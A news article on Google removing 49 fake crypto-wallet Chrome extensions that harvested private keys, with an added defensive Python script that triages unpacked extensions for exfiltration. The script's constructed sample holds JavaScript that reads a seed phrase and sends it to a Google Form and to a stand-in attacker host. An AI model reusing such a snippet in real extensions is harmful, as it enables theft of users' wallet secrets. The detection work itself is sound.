Google removes 49 more crypto data-stealing malicious extensions

Published: Apr 15, 2020
Updated: Apr 28, 2020
  • Google recently removed 49 more extensions from its Chrome Web Store.
  • The removed extensions impersonated well-known wallet apps in order to steal users' crypto wallet secrets.
  • The creator of the extensions remains unknown at this time, but researchers confirmed that a single entity is behind all of them.


Google’s Chrome Web Store has recently seen a surge of fake extensions built to steal users' crypto wallet data. The problem has grown large enough that Google has begun removing such extensions in bulk.

The company has now removed another 49 such extensions from the Chrome Web Store to protect its users. The extensions trick users into installing them and then harvest the secrets that control their crypto wallets.


Extensions posed as well-known wallet apps


MyCrypto’s director of security, Harry Denley, explained the issue in detail in his recent post on Medium. He stated that the extensions manage to trick users into installing them by impersonating various apps.

One of the impersonated brands is Ledger, the case that made multiple headlines recently. Others include Electrum, Jaxx, KeepKey, Trezor, MetaMask, MyEtherWallet and Exodus.

Once installed, the extensions capture the wallets’ private keys and similar sensitive data. Denley also noted that some of the extensions are supported by networks of fake accounts that leave top ratings and positive reviews in the store, making the fakes look trustworthy to the next victim.

The extensions themselves contain the malicious code: they record whatever wallet secrets the user enters into them and then send that data either to a Google Form or to a remote server controlled by the attacker.
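As an added example, not part of this article or of Denley's report, the following Python script shows the kind of triage a defender can run on an unpacked extension to look for the two behaviours described above: reading what the user types and sending it to a Google Form or to a host the manifest never declared. The extension files, names and URLs it scans are constructed placeholders, not a real extension's.

```python
"""Triage an unpacked browser extension for credential-exfiltration indicators.

Added example (not from the article or from Denley's report). Given the files
of an unpacked extension, it flags scripts that read typed values and make
network requests, that post to a Google Forms endpoint, or that contact a host
the manifest's permissions never declared. The sample extension at the bottom
is constructed for illustration; every name and URL in it is a placeholder.
"""
import json
import re
from urllib.parse import urlparse

# Network-send primitives available to extension scripts.
SEND_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\s*\(")
# Reading what the user typed: input values, form serialisation, password fields.
HARVEST_RE = re.compile(r"\.value\b|new\s+FormData\s*\(|type=['\"]password")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def declared_hosts(manifest):
    """Hosts the manifest asks for; '*' means the extension wants every origin."""
    hosts = set()
    for key in ("permissions", "host_permissions"):  # MV2 and MV3 locations
        for entry in manifest.get(key, []):
            if entry == "<all_urls>":
                hosts.add("*")
            elif "://" in entry:
                host = urlparse(entry.replace("*://", "https://")).hostname or ""
                hosts.add("*" if host == "*" else host.lstrip("*."))
    hosts.discard("")
    return hosts


def host_allowed(host, allowed):
    """True if host is covered by a declared host pattern (or by a wildcard)."""
    return "*" in allowed or any(host == a or host.endswith("." + a) for a in allowed)


def triage(files):
    """files: {path: text} of an unpacked extension. Returns sorted (path, reason) findings."""
    manifest = json.loads(files["manifest.json"])
    allowed = declared_hosts(manifest)
    findings = []
    if "*" in allowed:
        findings.append(("manifest.json", "requests access to every origin"))
    for path, src in files.items():
        if not path.endswith(".js"):
            continue
        for url in sorted(set(URL_RE.findall(src))):
            host = urlparse(url).hostname or ""
            if host == "docs.google.com" and "/forms/" in url:
                findings.append((path, "sends to a Google Form: " + url))
            elif host and not host_allowed(host, allowed):
                findings.append((path, "contacts undeclared host " + host))
        if HARVEST_RE.search(src) and SEND_RE.search(src):
            findings.append((path, "reads typed values and makes network requests"))
    return sorted(findings)


# Constructed sample of an unpacked extension posing as a wallet helper.
# The manifest only declares *.wallet.example, yet content.js ships the typed
# recovery phrase to a Google Form and to an undeclared collector host.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "Wallet Helper (constructed sample)",
        "version": "1.0",
        "permissions": ["storage", "*://*.wallet.example/*"],
        "content_scripts": [{"matches": ["*://*.wallet.example/*"], "js": ["content.js"]}],
    }),
    "content.js": (
        "const phrase = document.querySelector('#seed').value;\n"
        "const body = new FormData();\n"
        "body.append('entry.1', phrase);\n"
        "fetch('https://docs.google.com/forms/d/e/PLACEHOLDER/formResponse', {method: 'POST', body});\n"
        "navigator.sendBeacon('https://collector.attacker.example/log', phrase);\n"
    ),
    # Benign script: only talks to the host the manifest declares, reads no input.
    "popup.js": "fetch('https://api.wallet.example/price').then(r => r.json());\n",
}

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_EXTENSION):
        print(f"{path}: {reason}")
```

The script is a first-pass filter, not proof of malice: a legitimate wallet extension also reads typed values and talks to the network, so the signal is the destination. A Google Forms `formResponse` URL or a host outside the declared permissions inside a script that handles seed phrases or keys is what warrants pulling the extension apart by hand.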

All of the extensions come from a single entity, likely from Russia


Another notable detail from the report is that all of these extensions appear to come from the same person or group, and that the creator allegedly has links to Russia.

The attacker also took an unusual approach to victims: the stolen secrets were not used to drain wallets as soon as they were captured. Denley suggests the attacker may be waiting in order to single out high-value wallets. Another explanation is that the attacker has not yet automated the theft process.

The researcher tested this theory by sending funds to several addresses and deliberately letting the extensions capture their credentials. The funds remained untouched. With the attacker still unidentified, it is likely that further extensions of this kind will appear, so users should stay alert when adding new extensions to their browser.